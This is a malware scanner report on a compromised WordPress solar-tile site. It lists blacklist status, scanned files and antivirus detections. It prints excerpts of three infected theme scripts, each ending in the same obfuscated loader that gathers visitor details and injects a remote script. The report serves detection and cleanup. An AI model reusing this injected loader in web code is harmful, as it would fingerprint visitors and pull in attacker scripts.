New scan:

Malware Scanner report for tuiles-solaires.org

Malicious/Suspicious/Total urls checked
4/0/22
4 pages have malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "tuiles-solaires.org" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=tuiles-solaires.org

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tuiles-solaires.org/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://tuiles-solaires.org/
200 OK
Content-Length: 44527
Content-Type: text/html
clean
http://tuiles-solaires.org/wp-includes/js/jquery/jquery.js?ver=1.11.0
200 OK
Content-Length: 96402
Content-Type: application/javascript
clean
http://tuiles-solaires.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 7200
Content-Type: application/javascript
clean
http://tuiles-solaires.org/wp-content/plugins/login-with-ajax/widget/login-with-ajax.js?ver=3.9.2
200 OK
Content-Length: 4868
Content-Type: application/javascript
clean
http://w.sharethis.com/button/buttons.js
200 OK
Content-Length: 145774
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

if(typeof(stlib)=="undefined"){var stlib={}}if(!stlib.functions){stlib.functions=[];stlib.functionCount=0}stlib.global={};stlib.global.hash=document.location.href.split("#");stlib.global.hash.shift();stlib.global.hash=stlib.global.hash.join("#");stlib.dynamicOn=true;stlib.debugOn=false;stlib.debug={count:0,messages:[],debug:function(b,a){if(a&&(typeof console)!="undefined"){console.log(b)}stlib.debug.messages.push(b)},show:function(a){for(message in stlib.debug.messages){if((typeof conso
... 3023 bytes are skipped ...
Listener("DOMContentLoaded",stLight.onDomContentLoadedLazy,false)}}}if(typeof(window.addEventListener)!="undefined"){window.addEventListener("message",stLight.messageReceiver,false)}else{if(typeof(document.addEventListener)!="undefined"){document.addEventListener("message",stLight.messageReceiver,false)}else{if(typeof window.attachEvent!="undefined"){window.attachEvent("onmessage",stLight.messageReceiver)}}}if(document.readyState=="complete"&&stLight.readyRun==false){stLight.domReady()};

Antivirus reports:

Qihoo-360
susp.cve.20142804.1

http://tuiles-solaires.org/wp-content/themes/acha%20group%C3%A9/js/jquery-1.js
200 OK
Content-Length: 92678
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!cj[a]){var b=f("<"+a+">").appendTo("body"),d=b.css("display");b.remove();if(d==="none"||d===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),c.body.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write("<!doctype><html><body></body></html>");b=cl.createElement(a),cl.bod
... 3155 bytes are skipped ...
ent=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;

Antivirus reports:

AntiVir
JS/Infected.B
Avast
JS:Agent-PL [Trj]
Ikarus
Trojan.JS.WPress
nProtect
Trojan.JS.WPress.A
K7AntiVirus
Trojan
Emsisoft
Trojan.JS.WPress.A (B)
Comodo
TrojWare.JS.Agent.orb
DrWeb
JS.IFrame.341
Kaspersky
Trojan-Downloader.JS.Agent.gmf
Microsoft
Trojan:JS/Alescurf.C
PCTools
Malware.JS-Alescurf
TotalDefense
JS/Alescurf.A
NANO-Antivirus
Trojan.Script.Agent.lymqb
ClamAV
JS.Exploit-4
F-Secure
Trojan.JS.WPress.A
VIPRE
Trojan.JS.Generic (v)
F-Prot
JS/Agent.PL
AVG
JS/Agent
Norman
DLoader.BGGZ
Sophos
Troj/JSRedir-DO
GData
Trojan.JS.WPress.A
Symantec
JS.Alescurf
Commtouch
JS/Agent.PL
Agnitum
Trojan.DL.JS.Agent.O
BitDefender
Trojan.JS.WPress.A

http://tuiles-solaires.org/wp-content/themes/acha%20group%C3%A9/js/jquery-ui-1.js
200 OK
Content-Length: 84964
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(c,j){function k(a){return!c(a).parents().andSelf().filter(function(){return c.curCSS(this,"visibility")==="hidden"||c.expr.filters.hidden(this)}).length}c.ui=c.ui||{};if(!c.ui.version){c.extend(c.ui,{version:"1.8.7",keyCode:{ALT:18,BACKSPACE:8,CAPS_LOCK:20,COMMA:188,COMMAND:91,COMMAND_LEFT:91,COMMAND_RIGHT:93,CONTROL:17,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,INSERT:45,LEFT:37,MENU:93,NUMPAD_ADD:107,NUMPAD_DECIMAL:110,NUMPAD_DIVIDE:111,NUMPAD_ENTER:108,NUMPAD_MULTIPLY:106,<
... 3087 bytes are skipped ...
ent=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;

Antivirus reports:

AntiVir
JS/Infected.B
Avast
JS:Agent-PL [Trj]
Ikarus
Trojan.JS.WPress
nProtect
Trojan.JS.WPress.A
K7AntiVirus
Trojan
Emsisoft
Trojan.JS.WPress.A (B)
Comodo
TrojWare.JS.Agent.orb
DrWeb
JS.IFrame.341
Kaspersky
Trojan-Downloader.JS.Agent.gmf
Microsoft
Trojan:JS/Alescurf.C
Fortinet
JS/Redirector.KO!tr
PCTools
Malware.JS-Alescurf
TotalDefense
JS/Alescurf.A
NANO-Antivirus
Trojan.Script.Agent.lymqb
F-Secure
Trojan.JS.WPress.A
VIPRE
Trojan.JS.Generic (v)
F-Prot
JS/Agent.PL
AVG
JS/Agent
Norman
DLoader.BGGZ
Sophos
Troj/JSRedir-DO
GData
Trojan.JS.WPress.A
Symantec
JS.Alescurf
Commtouch
JS/Agent.PL
Agnitum
Trojan.DL.JS.Agent.O
BitDefender
Trojan.JS.WPress.A

http://tuiles-solaires.org/wp-content/themes/acha%20group%C3%A9/js/common.js
200 OK
Content-Length: 61100
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

if(GlobalSettings.reportErrors){window.onerror=function(c,a,b){if(/^http:\/\/(?:a\.img-dpreview\.com|www\.dpreview\.com|forums\.dpreview\.com|dpreview\.com|dpreview\.co\.uk)/i.exec(a)){$.get("/jserror.asp",{message:c,url:a,line:b,page:location.href});return false}}}(function(){var w=/webkit.*mobile/i.test(navigator.userAgent);function G(I){return GlobalSettings.assetsRoot+I+(!GlobalSettings.isLive?"":"?"+GlobalSettings.assetsVersion)}function h(K,I){var L=["B","KB","MB","GB"];var J=K==0?0:Math.f
... 3087 bytes are skipped ...
ent=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;

Antivirus reports:

AntiVir
JS/Infected.B
Avast
JS:Agent-PL [Trj]
Ikarus
Trojan.JS.WPress
nProtect
Trojan.JS.WPress.A
Emsisoft
Trojan.JS.WPress.A (B)
Comodo
TrojWare.JS.Agent.orb
McAfee-GW-Edition
Heuristic.BehavesLike.JS.BufferOverflow.G
DrWeb
JS.IFrame.341
Kaspersky
Trojan-Downloader.JS.Agent.gmf
Microsoft
Trojan:JS/Alescurf.C
Fortinet
JS/Redirector.KO!tr
PCTools
Malware.JS-Alescurf
TotalDefense
JS/Alescurf.A
F-Secure
Trojan.JS.WPress.A
VIPRE
Trojan.JS.Generic (v)
AVG
JS/Agent
Norman
DLoader.BGGZ
Sophos
Troj/JSRedir-DO
GData
Trojan.JS.WPress.A
Symantec
JS.Alescurf
Agnitum
Trojan.DL.JS.Agent.O
ESET-NOD32
JS/Agent.NEF
BitDefender
Trojan.JS.WPress.A

http://tuiles-solaires.org/Product_files/menu.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 01 Oct 2014 17:51:42 GMT
Location: http://tuiles-solaires.org/Product_files/menu.js/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: wfvt_1994858681=542c3f2e9b2fe; expires=Wed, 01-Oct-2014 18:21:42 GMT; path=/; httponly
X-Pingback: http://tuiles-solaires.org/xmlrpc.php
clean
http://tuiles-solaires.org/product_files/menu.js/
200 OK
Content-Length: 44527
Content-Type: text/html
clean
http://tuiles-solaires.org/product_files/menu.js/Product_files/menu.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 01 Oct 2014 17:51:47 GMT
Location: http://tuiles-solaires.org/product_files/menu.js/Product_files/menu.js/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: wfvt_1994858681=542c3f32e938b; expires=Wed, 01-Oct-2014 18:21:46 GMT; path=/; httponly
X-Pingback: http://tuiles-solaires.org/xmlrpc.php
clean
http://tuiles-solaires.org/product_files/menu.js/product_files/menu.js/
200 OK
Content-Length: 44527
Content-Type: text/html
clean
http://tuiles-solaires.org/product_files/menu.js/product_files/menu.js/Product_files/menu.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 01 Oct 2014 17:51:53 GMT
Location: http://tuiles-solaires.org/product_files/menu.js/product_files/menu.js/Product_files/menu.js/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: wfvt_1994858681=542c3f39390f5; expires=Wed, 01-Oct-2014 18:21:53 GMT; path=/; httponly
X-Pingback: http://tuiles-solaires.org/xmlrpc.php
clean
http://tuiles-solaires.org/product_files/menu.js/product_files/menu.js/product_files/menu.js/
200 OK
Content-Length: 44527
Content-Type: text/html
clean
http://tuiles-solaires.org/product_files/menu.js/product_files/menu.js/product_files/menu.js/Product_files/menu.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 01 Oct 2014 17:51:57 GMT
Location: http://tuiles-solaires.org/product_files/menu.js/product_files/menu.js/product_files/menu.js/Product_files/menu.js/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: wfvt_1994858681=542c3f3d02354; expires=Wed, 01-Oct-2014 18:21:56 GMT; path=/; httponly
X-Pingback: http://tuiles-solaires.org/xmlrpc.php
clean
http://tuiles-solaires.org/product_files/menu.js/product_files/menu.js/product_files/menu.js/product_files/menu.js/
200 OK
Content-Length: 44527
Content-Type: text/html
clean
http://tuiles-solaires.org/product_files/menu.js/product_files/menu.js/product_files/menu.js/product_files/menu.js/Product_files/menu.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 01 Oct 2014 17:52:03 GMT
Location: http://tuiles-solaires.org/product_files/menu.js/product_files/menu.js/product_files/menu.js/product_files/menu.js/Product_files/menu.js/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: wfvt_1994858681=542c3f43b6d00; expires=Wed, 01-Oct-2014 18:22:03 GMT; path=/; httponly
X-Pingback: http://tuiles-solaires.org/xmlrpc.php
clean
http://tuiles-solaires.org/product_files/menu.js/product_files/menu.js/product_files/menu.js/product_files/menu.js/product_files/menu.js/
200 OK
Content-Length: 44527
Content-Type: text/html
clean
http://tuiles-solaires.org/product_files/menu.js/product_files/menu.js/product_files/menu.js/product_files/menu.js/product_files/menu.js/Product_files/menu.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 01 Oct 2014 17:52:07 GMT
Location: http://tuiles-solaires.org/product_files/menu.js/product_files/menu.js/product_files/menu.js/product_files/menu.js/product_files/menu.js/Product_files/menu.js/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: wfvt_1994858681=542c3f477ce5d; expires=Wed, 01-Oct-2014 18:22:07 GMT; path=/; httponly
X-Pingback: http://tuiles-solaires.org/xmlrpc.php
clean
http://tuiles-solaires.org/product_files/menu.js/product_files/menu.js/product_files/menu.js/product_files/menu.js/product_files/menu.js/product_files/menu.js/
200 OK
Content-Length: 44527
Content-Type: text/html
clean
http://tuiles-solaires.org/product_files/menu.js/product_files/menu.js/product_files/menu.js/product_files/menu.js/product_files/menu.js/product_files/menu.js/Product_files/menu.js
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 01 Oct 2014 17:52:11 GMT
Location: http://tuiles-solaires.org/product_files/menu.js/product_files/menu.js/product_files/menu.js/product_files/menu.js/product_files/menu.js/product_files/menu.js/Product_files/menu.js/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: wfvt_1994858681=542c3f4b167e3; expires=Wed, 01-Oct-2014 18:22:11 GMT; path=/; httponly
X-Pingback: http://tuiles-solaires.org/xmlrpc.php
clean
http://tuiles-solaires.org/product_files/menu.js/product_files/menu.js/product_files/menu.js/product_files/menu.js/product_files/menu.js/product_files/menu.js/product_files/menu.js/
200 OK
Content-Length: 44527
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: tuiles-solaires.org

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 17:51:33 GMT
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Link: <http://tuiles-solaires.org/>; rel=shortlink
Set-Cookie: wfvt_1994858681=542c3f255dee1; expires=Wed, 01-Oct-2014 18:21:33 GMT; path=/; httponly
X-Pingback: http://tuiles-solaires.org/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: tuiles-solaires.org
Referer: http://www.google.com/search?q=tuiles-solaires.org

Result:
The result is similar to the first query. There are no suspicious redirects found.